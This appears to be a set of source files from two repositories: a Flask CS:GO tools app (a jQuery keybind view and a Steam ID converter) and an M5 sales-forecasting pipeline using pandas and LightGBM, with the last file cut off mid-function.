function(itemsObj){\n var thisItem, menu, image, name;\n \n for (var item in itemsObj){\n thisItem = itemsObj[item];\n menu = this.el.find('.js-dropMenu[bind=\"'+thisItem.category+'\"]');\n image = '<div class=\"row\"><img src=\"/static/images/keybind/'+thisItem.bind+'.png\"></div>';\n name = '<div class=\"row js-menuItem\" bind=\"'+thisItem.bind+'\"><p>'+thisItem.displayName+'</p></div>';\n \n menu.find('.js-itemPhotos').append(image);\n menu.find('.js-itemNames').append(name); \n };\n \n this.cacheDom();\n },\n\n show: function(keyName){\n this.keyDisplay.html(keyName);\n this.dark.fadeIn(250);\n transitions.show(this.el);\n },\n \n hide: function(){\n this.dark.fadeOut(250);\n transitions.hide(this.el, 250);\n this.hideDropMenus();\n },\n \n toggleDropMenu: function(menu){\n var thisMenu = this.el.find('.js-dropMenu[bind=\"'+menu+'\"]');\n\n this.hideDropMenus();\n\n if (!thisMenu.is(':visible')){\n transitions.show(thisMenu);\n };\n },\n \n hideDropMenus: function(){\n this.dropMenus.each(function(){\n if ($(this).is(':visible')){\n transitions.hide($(this), 250);\n };\n });\n },\n \n renderItems: function(boundItems){\n var thisItem, image;\n this.loItems.remove();\n \n for (var i=0; i<boundItems.length; i++){\n thisItem = boundItems[i];\n image = '<img src=\"/static/images/keybind/'+thisItem.bind+'.png\" bind=\"'+thisItem.bind+'\" title=\"'+thisItem.displayName+'\">'\n this.loadOut.find('.js-items[bind=\"'+thisItem.category+'\"]').append(image);\n };\n this.cacheDom();\n },\n};\n\nviews.bindsOutput = {\n cacheDom: function(){\n this.el = $('.js-bindsOutput');\n this.output = this.el.find('p');\n },\n \n renderBinds: function(keyBindsObj){\n this.output.html('');\n var html = this.output.html();\n \n for (var key in keyBindsObj){\n var thisKey = keyBindsObj[key];\n this.output.html(html + ' bind ' + thisKey.name);\n html = this.output.html();\n \n for (var i=0; i<thisKey.items.length; i++){\n this.output.html(html + ' ' + '\"buy '+thisKey.items[i]+'\"');\n html = this.output.html();\n };\n };\n },\n};" }, { "alpha_fraction": 0.4298013150691986, "alphanum_fraction": 0.43841060996055603, "avg_line_length": 22.24615478515625, "blob_id": "cf8c1865965698e1df3f76f98bdd098efe7b021c", "content_id": "7956020ab75d437e0ca40c9688187b6e0016d1ea", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1622, "license_type": "permissive", "max_line_length": 61, "num_lines": 65, "path": "/app/static/js/common.js", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "/**\n * Created by Faith on 16/7/6.\n */\n\n$(function () {\n // PJAX\n $(document).pjax(\"#navbar a[href!='/logout']\", \"#main\", {\n fragment: \"#main\",\n timeout: 10000,\n maxCacheLength: 0\n });\n // 设置动态active\n $(\"#navbar a\").click(function (e) {\n $(\"#navbar a\").removeClass(\"active\");\n $(this).addClass(\"active\");\n });\n // 设置加载动画\n $(document).on(\"pjax:start\", function () {\n $(\"#loader\").addClass(\"active\");\n });\n $(document).on(\"pjax:end\", function () {\n $(\"#loader\").removeClass(\"active\");\n });\n // 初始化下拉菜单\n $('select.dropdown').dropdown();\n // 初始化富文本编辑器\n var editor = new Simditor({\n textarea: $('#editor'),\n toolbar: [\n 'title',\n 'bold',\n 'italic',\n 'underline',\n 'strikethrough',\n 'fontScale',\n 'color',\n 'ol',\n 'ul',\n 'blockquote',\n 'code',\n 'table',\n 'link',\n 'image',\n 'hr',\n 'indent',\n 'outdent',\n 'alignment'\n ]\n });\n});\n\nfunction confirm_delete(url) {\n swal({\n title: \"你确定吗?\",\n text: \"你将不会恢复此过程!\",\n type: \"warning\",\n showCancelButton: true,\n confirmButtonColor: \"#DD6B55\",\n confirmButtonText: \"是的,删除它!\",\n closeOnConfirm: false\n }, function () {\n swal(\"已删除!\", \"你的删除请求已成功.\", \"success\");\n window.location.href = url;\n });\n}" }, { "alpha_fraction": 0.6400445699691772, "alphanum_fraction": 0.6530460715293884, "avg_line_length": 39.80303192138672, "blob_id": "f4a91e0d858763e36400803f0c25ef26b9053605", "content_id": "0a5a33d4677708b2df42f11d6152937c289bef38", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2692, "license_type": "permissive", "max_line_length": 99, "num_lines": 66, "path": "/app/utils.py", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "import urllib.request, re\nfrom xml.dom import minidom\n\nclass steam_convert():\n def __init__(self, userid):\n self.userURL = \"http://steamcommunity.com/id/{USER}/?xml=1\"\n self.idURL = \"http://steamcommunity.com/profiles/{ID}/?xml=1\"\n self.steamIDBase = 76561197960265728\n self.userid = userid\n\n def convertCommunityIDToCustomURL(self, communityID):\n dom = minidom.parse(urllib.request.urlopen(re.sub(\"\\{ID\\}\", str(communityID), self.idURL)))\n customURL = dom.getElementsByTagName(\"customURL\")[0].firstChild.data\n return customURL\n\n def convertCommunityIDToSteamID(self, communityID):\n steamID = []\n steamID.append(\"STEAM_0:\")\n steamIDLastPart = communityID - self.steamIDBase\n if steamIDLastPart % 2 == 0:\n steamID.append(\"0:\")\n else:\n steamID.append(\"1:\")\n steamID.append(str(steamIDLastPart // 2))\n return \"\".join(steamID)\n\n def convertCustomURLToCommunityID(self, customURL):\n dom = minidom.parse(urllib.request.urlopen(re.sub(\"\\{USER\\}\", customURL, self.userURL)))\n communityID = dom.getElementsByTagName(\"steamID64\")[0].firstChild.data\n return int(communityID)\n\n def convertCustomURLToSteamID(self, customURL):\n communityID = self.convertCustomURLToCommunityID(customURL)\n return self.convertCommunityIDToSteamID(communityID)\n\n def convertSteamIDToCommunityID(self, steamID):\n steamIDParts = re.split(\":\", steamID)\n communityID = int(steamIDParts[2]) * 2\n if steamIDParts[1] == \"1\":\n communityID += 1\n communityID += self.steamIDBase\n return communityID\n\n def convertSteamIDToCustomURL(self, steamID):\n communityID = self.convertSteamIDToCommunityID(steamID)\n return self.convertCommunityIDToCustomURL(communityID)\n\n def getResult(self):\n if self.userid.startswith(\"STEAM_0:\"):\n steamID = self.userid\n communityID = self.convertSteamIDToCommunityID(steamID)\n customURL = self.convertCommunityIDToCustomURL(communityID)\n elif re.match(\"^\\d*$\", self.userid):\n communityID = int(self.userid)\n steamID = self.convertCommunityIDToSteamID(communityID)\n customURL = self.convertCommunityIDToCustomURL(communityID)\n else:\n # assuming valid custom url\n customURL = self.userid\n communityID = self.convertCustomURLToCommunityID(customURL)\n steamID = self.convertCommunityIDToSteamID(communityID)\n return {\n 'customURL': customURL,\n 'communityID': communityID,\n 'steamID': steamID\n }" } ]
14
poanse/m5-forecasting-accuracy
https://github.com/poanse/m5-forecasting-accuracy
199b5de9f165eaaa947f576e8dd7149c0d956cce
ab649ae15c4a7f1ad7e39bd193f6997c2f236b24
f31a57dcf9d415acaf38e9ffb59d6b27d11889bf
refs/heads/main
2023-01-04T07:45:05.577388
2020-10-20T10:53:17
2020-10-20T10:53:17
305,494,415
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6059123277664185, "alphanum_fraction": 0.6366972327232361, "avg_line_length": 27.6900577545166, "blob_id": "be18bbe6bd3452bcd90953dbd22c0519c5c900b8", "content_id": "33a85ed88c9f4e4ea6b68ebbf0cdbd861a64c92a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4905, "license_type": "no_license", "max_line_length": 94, "num_lines": 171, "path": "/step.py", "repo_name": "poanse/m5-forecasting-accuracy", "src_encoding": "UTF-8", "text": "from utils import *\nfrom datetime import datetime\n\ndef step(parameters):\n add_model(parameters)\n model_id = get_model_id(parameters)\n evaluate_model(model_id)\n pass\n\nparameters = {\n 'fcst_horizon' : 4,\n 'history_length' : 730,\n 'lgbm_params':{\n \"objective\" : \"poisson\",\n \"metric\" :\"rmse\",\n \"force_row_wise\" : True,\n \"learning_rate\" : 0.075,\n # \"sub_feature\" : 0.8,\n \"sub_row\" : 0.75,\n \"bagging_freq\" : 1,\n \"lambda_l2\" : 0.1,\n \"metric\": [\"rmse\"],\n 'verbosity': 1,\n 'num_iterations' : 300,\n 'num_leaves': 64,\n \"min_data_in_leaf\": 100,\n 'seed': 0,\n 'n_jobs': -1\n }\n}\n\n# print(f\"Started at {datetime.now()}\")\n\n# parameters['lgbm_params']['num_iterations'] = 300\n# step(parameters)\n\n# print(f\"Finished model 1 at {datetime.now()}\")\n\n# parameters['lgbm_params']['num_iterations'] = 500\n# step(parameters)\n\n# print(f\"Finished model 2 at {datetime.now()}\")\n\n# parameters['lgbm_params']['num_iterations'] = 800\n# step(parameters)\n\n# print(f\"Finished model 3 at {datetime.now()}\")\n\n# parameters['lgbm_params']['num_iterations'] = 300\n# parameters['lgbm_params']['sub_feature'] = 0.7\n# step(parameters)\n\n# print(f\"Finished model 4 at {datetime.now()}\")\n\n# parameters['lgbm_params']['num_iterations'] = 300\n# parameters['lgbm_params']['sub_feature'] = 0.3\n# step(parameters)\n\n# print(f\"Finished model 5 at {datetime.now()}\")\n\n# parameters['lgbm_params']['num_iterations'] = 300\n# parameters['lgbm_params']['sub_feature'] = 1.0\n# parameters['lgbm_params']['num_leaves'] = 16\n# step(parameters)\n\n# print(f\"Finished model 6 at {datetime.now()}\")\n\n# parameters['lgbm_params']['num_iterations'] = 300\n# parameters['lgbm_params']['sub_feature'] = 1.0\n# parameters['lgbm_params']['num_leaves'] = 256\n# step(parameters)\n\n# print(f\"Finished all 7 models at {datetime.now()}\")\n\n\n\n# store_ids = ['CA_1', 'CA_2', 'CA_3', 'CA_4', 'TX_1', 'TX_2', 'TX_3', 'WI_1', 'WI_2', 'WI_3']\n# i = 1\n# for store_id in store_ids:\n# print (f'Step {i} out of {len(store_ids)} started at {datetime.now()}')\n# # value_filter = {'state_id' : [state_id], 'cat_id' : [cat_id]}\n# value_filter = {'store_id' : [store_id]}\n# abt = create_abt(value_filter=value_filter)\n# abt.to_pickle(f'./work/abt_{store_id}.pkl')\n# # abt.to_csv(f'./work/baseline_abt_{store_id}.csv')\n# abt = None\n# i += 1\n# print (f'Finished creating abt at {datetime.now()}')\n\n\nparameters = {\n 'fcst_horizon' : 4,\n 'history_length' : 730,\n 'history_start' : 35,\n 'lgbm_params':{\n \"objective\" : \"poisson\",\n \"metric\" :\"rmse\",\n \"force_row_wise\" : True,\n \"learning_rate\" : 0.075,\n # \"sub_feature\" : 0.8,\n \"sub_row\" : 0.75,\n \"bagging_freq\" : 1,\n \"lambda_l2\" : 0.1,\n \"metric\": [\"rmse\"],\n 'verbosity': 1,\n 'num_iterations' : 300,\n 'num_leaves': 16,\n \"min_data_in_leaf\": 100,\n 'seed': 0,\n 'n_jobs': -1\n }\n}\nadd_model(parameters)\nmodel_id = get_model_id(parameters)\nevaluate_model(model_id)\nget_val_fcst(model_id)\nprepare_val_submission(model_id)\n\nprint (f'Finished creating creating forecast for model {model_id} at {datetime.now()}')\n\nparameters['history_length'] = 1100\nadd_model(parameters)\nmodel_id = get_model_id(parameters)\nevaluate_model(model_id)\n# prepare_val_submission(model_id)\n\nprint (f'Finished creating creating forecast for model {model_id} at {datetime.now()}')\n\nparameters['history_length'] = 730\nparameters['lgbm_params']['num_iterations'] = 500\nadd_model(parameters)\nmodel_id = get_model_id(parameters)\nevaluate_model(model_id)\nget_val_fcst(model_id)\nprepare_val_submission(model_id)\n\nprint (f'Finished creating creating forecast for model {model_id} at {datetime.now()}')\n\nparameters['history_length'] = 730\nparameters['lgbm_params']['num_iterations'] = 300\nparameters['lgbm_params']['num_leaves'] = 64\nadd_model(parameters)\nmodel_id = get_model_id(parameters)\nevaluate_model(model_id)\nget_val_fcst(model_id)\nprepare_val_submission(model_id)\n\nprint (f'Finished creating creating forecast for model {model_id} at {datetime.now()}')\n\nparameters['history_length'] = 1100\nparameters['lgbm_params']['num_iterations'] = 500\nparameters['lgbm_params']['num_leaves'] = 16\nadd_model(parameters)\nmodel_id = get_model_id(parameters)\nevaluate_model(model_id)\n# prepare_val_submission(model_id)\n\n\nprint (f'Finished creating creating forecast for model {model_id} at {datetime.now()}')\n\nparameters['history_length'] = 730\nparameters['lgbm_params']['num_iterations'] = 300\nparameters['lgbm_params']['num_leaves'] = 16\nparameters['lgbm_params']['min_data_in_leaf'] = 10000\nadd_model(parameters)\nmodel_id = get_model_id(parameters)\nevaluate_model(model_id)\nget_val_fcst(model_id)\nprepare_val_submission(model_id)\n\nprint (f'Finished creating creating forecast for model {model_id} at {datetime.now()}')" }, { "alpha_fraction": 0.5637272596359253, "alphanum_fraction": 0.5745624303817749, "avg_line_length": 42.408103942871094, "blob_id": "ab20ab125a19544949ea0776f64bb82393c1fa95", "content_id": "bc2bd1de38895ab8dd685099e7d8a8d259ed4530", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30193, "license_type": "no_license", "max_line_length": 172, "num_lines": 691, "path": "/utils.py", "repo_name": "poanse/m5-forecasting-accuracy", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\nimport pickle\nimport os\nimport lightgbm as lgb\nimport gc\n\ndef read_train(filename = './data/sales_train_evaluation.csv'):\n # num_columns = ['d_{}'.format(i) for i in range(1,1914)]\n if 'sales.pkl' not in os.listdir('./data'):\n columns = pd.read_csv(filename, header=0, nrows=0).columns\n num_columns = [col for col in columns if col.startswith('d_')]\n dtypes = ['uint16'] * len(num_columns)\n dtypes = dict(zip(num_columns, dtypes))\n df = pd.read_csv(filename, dtype=dtypes)\n df['id'] = df['id'].str[:-len(\"evaluation\")] + \"validation\"\n df.to_pickle('./data/sales.pkl')\n else:\n df = pd.read_pickle('./data/sales.pkl')\n return df\n\ndef read_calendar(filename = './data/calendar.csv'):\n if 'calendar.pkl' not in os.listdir('./data'):\n df = pd.read_csv(filename, parse_dates=['date'])\n df.to_pickle('./data/calendar.pkl')\n else:\n df = pd.read_pickle('./data/calendar.pkl')\n return df\n\ndef read_prices(filename = './data/sell_prices.csv'):\n if 'sell_prices.pkl' not in os.listdir('./data'):\n df = pd.read_csv(filename)\n df['wm_yr_wk'] = df['wm_yr_wk'].astype('uint16')\n df['sell_price'] = (100 * df['sell_price']).astype('uint16')\n df.sort_values(['store_id', 'item_id', 'wm_yr_wk'], inplace=True)\n df.to_pickle('./data/sell_prices.pkl')\n else:\n df = pd.read_pickle('./data/sell_prices.pkl')\n return df\n\n# columns = ['id', 'item_id', 'dept_id', 'cat_id', 'store_id', 'state_id']\nclass cat_encoder():\n def __init__(self):\n self.mapping = {}\n\n def encode(self, df, column):\n if column not in self.mapping:\n self.mapping[column] = {}\n for i, value in enumerate(sorted(list(set(df[column])))):\n self.mapping[column][value] = i\n else:\n # find values in df[column] that are not in mapping\n new_values = []\n for value in list(set(df[column])):\n if value not in self.mapping[column]:\n new_values.append(value)\n # add mapping for them\n if new_values != []:\n # find largest used number\n max_number = max(list(self.mapping[column].values()))\n # add mapping for new values\n for i, new_value in enumerate(sorted(new_values)):\n self.mapping[column][new_value] = max_number + i + 1\n\n new_column = df[column].map(self.mapping[column]).astype('uint16')\n return new_column\n\n def decode(self, df, column):\n tmp_mapping = {}\n for key, value in self.mapping[column].items():\n tmp_mapping[value] = key\n new_column = df[column].map(tmp_mapping)\n return new_column\n\ndef load_encoder():\n with open('encoder.pickle', 'rb') as handle:\n encoder = pickle.load(handle)\n return encoder\n\ndef save_encoder(encoder):\n with open('encoder.pickle', 'wb') as filename:\n pickle.dump(encoder, filename, protocol=pickle.HIGHEST_PROTOCOL)\n pass\n\ndef prepare_data(value_filter={}, mode='validation'):\n # read and filter train data\n sales = read_train()\n print(f'Rows before filter: {len(sales)}')\n if value_filter: # if dictionary is not empty\n for column, values in value_filter.items():\n if type(values) != list:\n values = [values]\n mask = sales[column].isin(values)\n sales = sales[mask]\n print(f'Rows after filter: {len(sales)}')\n\n # read and filter prices\n prices = read_prices()\n if value_filter: # if dictionary is not empty\n if 'store_id' in value_filter:\n column = 'store_id'\n values = value_filter[column]\n if type(values) != list:\n values = [values]\n mask = prices[column].isin(values)\n prices = prices[mask]\n\n calendar = read_calendar()\n\n # encode categorical feature to store less space\n\n encoder = load_encoder()\n # encoder = cat_encoder()\n for column in ['id', 'item_id', 'dept_id', 'cat_id', 'store_id', 'state_id']:\n sales[column] = encoder.encode(sales, column=column)\n for column in ['store_id', 'item_id']:\n prices[column] = encoder.encode(prices, column=column)\n\n # add forecast dates\n if mode == 'validation':\n fcst_date = 1914\n elif mode == 'evaluation':\n fcst_date = 1914 + 28\n for i in range(fcst_date, fcst_date + 28):\n sales[f'd_{i}'] = 0\n\n ### transform into time series data\n # save information about categorical variables into separate table\n summary = sales[['id', 'item_id', 'dept_id','cat_id','store_id','state_id']]\n # remove from the original table\n sales.drop(['item_id', 'dept_id','cat_id','store_id','state_id'],axis=1,inplace=True)\n # transform wide to long\n sales = sales.melt(id_vars='id', value_vars=sales.columns[1:], var_name='d', value_name='qty')\n sales['qty'] = sales['qty'].astype('uint16')\n # map days to dates\n d_to_date = dict(calendar[['date','d']].set_index('d')['date'])\n sales['d'] = sales['d'].map(d_to_date)\n # rename mapped column\n sales.rename(columns={'d':'date'}, inplace=True)\n # return categorial features\n sales = sales.join(summary.set_index('id'), on='id')\n\n return sales, prices, calendar, encoder\n\ndef day_to_week(day):\n return (day + 4) // 7\n\ndef create_abt(value_filter={}):\n sales, prices, calendar, encoder = prepare_data(value_filter)\n print('Data successfully prepared')\n\n # calculated date of the first sale and add it to summary and sales\n def add_feature_first_sale_date(df):\n firstbuy = df[df['qty']!=0].groupby('id')[['date']].min()\n firstbuy.rename(columns={'date':'firstbuy_date'}, inplace=True)\n dtmp = df[['id']].join(firstbuy, on='id', how='left')\n df['firstbuy_date'] = dtmp['firstbuy_date'].values\n pass\n\n add_feature_first_sale_date(sales)\n\n # remove starting zeroes for every TS\n sales = sales[sales['date'] >= sales['firstbuy_date']]\n\n # sort values by id and date to add lags\n sales.sort_values(['id', 'date'], inplace=True)\n\n # add day and week (number) features\n def add_features_day_week_num(sales, calendar):\n calendar['day'] = calendar['d'].apply(lambda x: int(x[2:])).astype('uint16')\n calendar['week'] = day_to_week(calendar['day']).astype('uint16')\n dtmp = sales[['date']].join(calendar[['date', 'day', 'week']].set_index('date'), on='date', how='left')\n sales['day'] = dtmp['day'].values\n sales['week'] = dtmp['week'].values\n pass\n \n add_features_day_week_num(sales, calendar)\n\n # add lag features\n def add_features_lags(sales):\n temp = sales[['id', 'day', 'qty']]\n temp.set_index(['id', 'day'], inplace=True)\n # сначала расчет фичей, потом джоины с шифтами\n sales_sum = pd.DataFrame({})\n # суммарные продажи за период (целые числа, можно хранить в uint16)\n for window in [7, 28, 91, 364]:\n temp2 = temp.groupby('id').apply(lambda x: x.rolling(window, min_periods=1).sum()).reset_index()\n temp2.rename(columns={'qty' : f'qty_sum_{window}'}, inplace=True)\n # reduce memory usage\n for column in temp2:\n temp2[column] = temp2[column].astype('uint16')\n # combine\n temp2.set_index(['id', 'day'], inplace=True)\n if sales_sum.empty:\n sales_sum = temp2\n else:\n sales_sum = sales_sum.join(temp2, on=['id', 'day'])\n\n # std\n for window in [28, 364]:\n temp2 = temp.groupby('id').apply(lambda x: x.rolling(window, min_periods=1).std()).reset_index()\n temp2.rename(columns={'qty' : f'qty_std_{window}'}, inplace=True)\n # reduce memory usage\n for column in temp2:\n temp2[column] = temp2[column].astype('float32')\n # combine\n temp2.set_index(['id', 'day'], inplace=True)\n sales_sum = sales_sum.join(temp2, on=['id', 'day'])\n\n # медианные продажи\n for window in [28, 364]:\n temp2 = temp.groupby('id').apply(lambda x: x.rolling(window, min_periods=1).median()).reset_index()\n temp2.loc[:, 'qty'] = temp2['qty'] * 2 # double to keep as int\n temp2.rename(columns={'qty' : f'qty_median_{window}'}, inplace=True)\n # reduce memory usage\n for column in temp2:\n temp2[column] = temp2[column].astype('uint16')\n # combine\n temp2.set_index(['id', 'day'], inplace=True)\n sales_sum = sales_sum.join(temp2, on=['id', 'day'])\n\n # отношения продаж за разные периоды\n for period in [28, 91, 364]:\n sales_sum[f'qty_sum_ratio_7_{period}'] = (sales_sum['qty_sum_7'] / sales_sum[f'qty_sum_{period}']).astype('float32')\n if period != 28:\n sales_sum[f'qty_sum_ratio_28_{period}'] = (sales_sum['qty_sum_28'] / sales_sum[f'qty_sum_{period}']).astype('float32')\n\n # джоин полученных фичей с различными шифтами (7, 14, 21, 28)\n periods = 0\n columns = [x for x in sales_sum.columns if x not in ['id', 'day']]\n for i in range(4):\n sales_sum.reset_index(inplace=True)\n sales_sum.loc[:, 'day'] = sales_sum['day'] + 7\n periods += 7\n sales_sum.set_index(['id', 'day'], inplace=True)\n sales_sum.columns = [x + f\"_{periods}\" for x in columns]\n sales_sum = sales[['id', 'day']].join(sales_sum, on=['id', 'day'])\n if 'id' in sales_sum.columns and 'day' in sales_sum.columns:\n sales_sum.set_index(['id', 'day'], inplace=True)\n # sales.set_index(['id', 'day'], inplace=True)\n for column in sales_sum.columns:\n sales[column] = sales_sum[column].fillna(0).values\n # sales.reset_index(inplace=True)\n\n for column in sales.columns:\n if 'sum' in column or 'median' in column:\n sales[column] = sales[column].astype('uint16')\n\n # лаги\n temp.reset_index(inplace=True)\n for lag in [7, 14, 21, 28, 35, 42, 49, 56, 364]:\n temp3 = temp.copy()\n temp3['day'] = temp3['day'] + lag\n column = f'lag_{lag}'\n temp3.rename(columns={'qty' : column}, inplace=True)\n temp3.set_index(['id', 'day'], inplace=True)\n temp3 = sales[['id', 'day']].join(temp3, on=['id', 'day'])\n sales[column] = temp3[column].fillna(0).astype('uint16')\n pass\n \n add_features_lags(sales)\n print('Lags successfully added')\n\n # events\n def add_features_events(sales, calendar):\n # divide events into separate columns by type\n for event_type in calendar['event_type_1'].dropna().unique():\n event_name_bytype = []\n for index, row in calendar.iterrows():\n if row['event_type_1'] == event_type:\n event_name_bytype.append(row['event_name_1'])\n elif row['event_type_2'] == event_type:\n event_name_bytype.append(row['event_name_2'])\n else:\n event_name_bytype.append(np.nan)\n event_type = event_type.lower()\n calendar[f'event_name_{event_type}'] = event_name_bytype\n \n calendar.drop(['event_name_1', 'event_name_2', 'event_type_1', 'event_type_2'], axis=1, inplace=True)\n calendar.fillna(method='backfill', inplace=True)\n\n for column in ['event_name_cultural', 'event_name_sporting', 'event_name_national', 'event_name_religious']:\n tmp = calendar[['year', column, 'day']].groupby(['year', column]).max().rename(columns={'day':'maxday'})\n dtmp = calendar[['year', column]].join(tmp, on=['year', column])\n calendar['maxday'] = dtmp['maxday'].values\n calendar[\"days_till_next_{}\".format(column.split('_')[2])] = calendar['maxday'] - calendar['day']\n calendar.drop('maxday', axis=1, inplace=True)\n\n dtmp = sales[['day']].join(calendar[['day','wday', 'month', 'year', 'wm_yr_wk',\n 'event_name_cultural', 'event_name_sporting', \n 'event_name_national', 'event_name_religious',\n 'days_till_next_cultural', 'days_till_next_sporting',\n 'days_till_next_national', 'days_till_next_religious']].set_index('day'), on='day')\n for column in dtmp.columns:\n if column not in ['day']:\n sales[column] = dtmp[column].values\n for column in ['event_name_cultural', 'event_name_sporting', 'event_name_national', 'event_name_religious']:\n sales[column] = encoder.encode(sales, column)\n for column in ['days_till_next_cultural', 'days_till_next_sporting', 'days_till_next_national', 'days_till_next_religious']:\n sales[column] = sales[column].astype('uint16')\n for column in ['wday', 'month']:\n sales[column] = sales[column].astype('uint8')\n for column in ['wm_yr_wk', 'year']:\n sales[column] = sales[column].astype('uint16')\n pass\n \n add_features_events(sales, calendar)\n print('Events successfully added')\n\n # add length of history\n sales['history_length'] = ((sales['date'] - sales['firstbuy_date']).dt.days).astype('int16')\n \n sales.drop('firstbuy_date', axis=1, inplace=True)\n\n # add day number in year\n sales['dayofyear'] = (sales['date'].dt.dayofyear).astype('uint16')\n\n # combine 3 snap columns into 1\n def add_feature_snap(sales, calendar):\n snap_columns = [x for x in calendar.columns if x.startswith('snap_')]\n temp = calendar[['day'] + snap_columns]\n state_ids = list(encoder.mapping['state_id'].keys())\n dtmps = pd.DataFrame({})\n for state_id in state_ids:\n snap_current = [x for x in snap_columns if x.endswith(state_id)][0]\n dtmp = temp[['day', snap_current]]\n dtmp.loc[:, 'state_id'] = encoder.mapping['state_id'][state_id]\n dtmp['snap'] = dtmp[snap_current].values\n dtmp.drop(snap_current, axis=1, inplace=True)\n dtmps = pd.concat([dtmps, dtmp])\n \n columns = ['day', 'state_id']\n dtmps.set_index(columns, inplace=True)\n dtmp = sales[columns].join(dtmps, on=columns)\n sales['snap'] = dtmp['snap'].values\n sales['snap'] = sales['snap'].astype('uint8')\n pass\n\n add_feature_snap(sales, calendar)\n print('Snaps successfully added')\n\n def add_features_price(sales, prices):\n # group by store, item\n temp = prices.copy()\n temp.loc[:, 'wm_yr_wk'] = temp.loc[:, 'wm_yr_wk'] + 1\n temp.set_index(['store_id', 'item_id', 'wm_yr_wk'], inplace=True)\n # calculate monthly mean\n temp = temp.groupby(['store_id', 'item_id']).apply(lambda x: x.rolling(4, min_periods=1).mean())\n temp.rename(columns={'sell_price':'price_mean_month'}, inplace=True)\n temp['price_mean_month'] = temp['price_mean_month'].astype(int)\n\n columns = ['store_id', 'item_id', 'wm_yr_wk']\n temp = temp.join(prices.set_index(columns), on=columns, how='left')\n # calculate ratio\n temp['price_mean_ratio_week_to_month'] = (temp['sell_price'] / temp['price_mean_month'])\n\n # price_columns = temp.columns\n # for period in [7, 14, 21, 28]:\n # # adjust week depending on horizon\n # temp.reset_index(inplace=True)\n # temp['wm_yr_wk'] = temp['wm_yr_wk'] + 1\n # temp.set_index(['store_id', 'item_id', 'wm_yr_wk'], inplace=True)\n # temp.columns = [x + f'_{period}' for x in price_columns]\n\n # dtmp = sales[columns].join(temp, on=columns)\n # dtmp.set_index(columns, inplace=True)\n # dtmp = dtmp.groupby(['store_id', 'item_id']).ffill().groupby(['store_id', 'item_id']).bfill()\n # for column in dtmp.columns:\n # if column not in columns:\n # sales[column] = dtmp[column].values\n # if 'sell_price' in column:\n # sales[column] = sales[column].astype('uint16')\n # elif 'price_mean_month' in column:\n # sales[column] = sales[column].astype('uint16')\n dtmp = sales[columns].join(temp, on=columns)\n dtmp.set_index(columns, inplace=True)\n dtmp = dtmp.groupby(['store_id', 'item_id']).ffill().groupby(['store_id', 'item_id']).bfill()\n for column in dtmp.columns:\n if column not in columns:\n sales[column] = dtmp[column].values\n if 'sell_price' in column:\n sales[column] = sales[column].astype('uint16')\n elif 'price_mean_month' in column:\n sales[column] = sales[column].astype('uint16')\n elif 'price_mean_ratio' in column:\n sales[column] = sales[column].astype('float32')\n pass\n \n add_features_price(sales, prices)\n print('Price features successfully added')\n\n # sales.dropna(inplace=True)\n sales.drop(['id', 'date'], axis=1, inplace=True)\n sales.reset_index(drop=True, inplace=True)\n\n sales['item_id'] = sales['item_id'].astype('uint16')\n sales['store_id'] = sales['store_id'].astype('uint8')\n\n print(\"don't forget to fill missing holidays: matters at evaluation\")\n print(\"don't forget to check which rows get removed\")\n\n save_encoder(encoder)\n return sales\n\n\n\n\n# masterfile adventures\ndef read_master(masterfile = 'master.csv'):\n df = pd.read_csv(masterfile, dtype={'model_id':str,'parameters':str})\n return df\n\ndef save_master(df, masterfile = 'master.csv'):\n df.to_csv(masterfile, index=False)\n print('Masterfile was updated')\n\ndef add_model(parameters, masterfile = 'master.csv'):\n '''\n Adds model to master file and gives it unique id\n '''\n if masterfile in os.listdir():\n df = read_master()\n if str(parameters) in list(df['parameters']):\n print(f'Model already included. No changes were made to {masterfile}')\n return False\n else:\n max_index = df['model_id'].astype(int).max()\n new_id = max_index + 1\n df.loc[new_id, 'model_id'] = '0'*(4-len(str(new_id))) + str(new_id)\n df.loc[new_id, 'parameters'] = str(parameters)\n else:\n print(f'Masterfile was not found and will be created at ./{masterfile}')\n df = pd.DataFrame({'model_id' : '0000', 'parameters' : str(parameters)}, index=[0])\n save_master(df)\n return True\n\ndef get_model_id(parameters, masterfile = 'master.csv'):\n '''\n Finds model_id with specified parameters in master file \n '''\n df = read_master()\n return df.loc[df['parameters'] == str(parameters), 'model_id'].values[0]\n\ndef get_model_parameters(model_id, masterfile = 'master.csv'):\n '''\n Returns parameters of the model with specified model_id from the masterfile\n '''\n df = read_master()\n return eval(df.loc[df['model_id'] == str(model_id), 'parameters'].values[0])\n\ndef check_model(model_id, months=[1,2,3], masterfile = 'master.csv'):\n '''\n Checks whether model is evaluated: prediction file exists\n '''\n flag = 0\n for month in months:\n name = f'{model_id}_{month}.csv'\n if name in os.listdir('./forecasts/'):\n print(f'{model_id} is evaluated for month {month}')\n else:\n flag += 1\n print(f'{model_id} is not evaluated for month {month}')\n if flag == 0:\n return True\n else:\n return False\n\ndef evaluate_model(model_id, months=[1, 2, 3]):\n '''\n Trains lgbm model given parameters and outputs model and prediction\n '''\n parameters = get_model_parameters(model_id)\n cat_feats = ['item_id', 'dept_id','store_id', 'cat_id', 'state_id']\n cat_feats = cat_feats + ['wday', 'month']\n cat_feats = cat_feats + ['event_name_cultural', 'event_name_sporting', 'event_name_national', 'event_name_religious']\n\n # state_ids = ['CA', 'TX', 'WI']\n store_ids = ['CA_1', 'CA_2', 'CA_3', 'CA_4', 'TX_1', 'TX_2', 'TX_3', 'WI_1', 'WI_2', 'WI_3']\n\n if 'by_variable' in list(parameters.keys()):\n by_variable = parameters['by_variable']\n else:\n by_variable = 'state_id'\n encoder = load_encoder()\n\n print(f'Models are divided by {by_variable}')\n values = list(encoder.mapping[by_variable].keys())\n print(values)\n\n fcst_horizon = parameters['fcst_horizon']\n history_length = parameters['history_length']\n history_start = parameters['history_start']\n i = 1\n for month in months:\n fcst_date = 1914 - 28 * month\n predictions = []\n for value in values:\n print(f'Step {i} out of {len(values) * len(months)}')\n # 1. read 